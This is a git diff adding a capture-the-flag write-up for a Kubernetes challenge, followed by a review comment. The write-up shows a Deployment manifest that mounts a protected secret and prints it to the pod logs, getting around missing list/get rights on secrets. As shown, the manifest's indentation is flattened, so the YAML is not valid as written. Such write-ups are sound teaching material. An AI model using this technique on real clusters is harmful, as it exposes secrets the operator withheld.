Diffstat (limited to 'punkctf/k8s_03.md')
-rw-r--r-- punkctf/k8s_03.md 39
1 files changed, 39 insertions, 0 deletions
diff --git a/punkctf/k8s_03.md b/punkctf/k8s_03.md
new file mode 100644
index 0000000..6f643be
--- /dev/null
+++ b/punkctf/k8s_03.md
@@ -0,0 +1,39 @@
+
+Using `kubectl auth can-i --list`, we see that we can't access secrets anymore, but we can create deployments.
+
+Looking at the existing pod, we see that it mounts a secret called `y0u-cant-l1st-m3-s3crets-n0w`, but it only outputs the hash and we can't exec into it in this challenge.
+
+We can create a deployment similar to the existing pod, but without the hashing:
+
+```yaml
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: flag-getter
+spec:
+ replicas: 1
+ selector:
+ matchLabels:
+ app: flag-getter
+ template:
+ metadata:
+ labels:
+ app: flag-getter
+ spec:
+ containers:
+ - command:
+ - cat
+ - /flag/flag
+ image: busybox
+ imagePullPolicy: IfNotPresent
+ name: flag-getter
+ volumeMounts:
+ - mountPath: /flag
+ name: flag
+ volumes:
+ - name: flag
+ secret:
+ secretName: y0u-cant-l1st-m3-s3crets-n0w
+```
+
+This will die immediately, but that's fine - just read the pod logs and it will have the flag.
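Review bot: The closing line ("just read the pod logs") ends the write-up without naming the root cause, and a sentence on it would make the lesson explicit: permission to create deployments in a namespace lets the workload mount any secret in that namespace by `secretName`, so removing get/list on `secrets` (the change noted in the first line from `kubectl auth can-i --list`) does not protect `y0u-cant-l1st-m3-s3crets-n0w`. Two smaller points on the same hunk. As rendered here the YAML has every nested key at one space of indentation (`selector:` and `matchLabels:` sit at the same level, as do `template:`, `metadata:` and `labels:`), so check that the committed file keeps the real nesting or the manifest will not apply. And since the container only runs `cat /flag/flag` and exits, a Deployment will keep restarting it; the text could say so where it notes that the pod "will die immediately", and mention deleting `flag-getter` afterwards. The file also starts with a blank line and no heading, so a title naming the challenge would help readers landing on it directly.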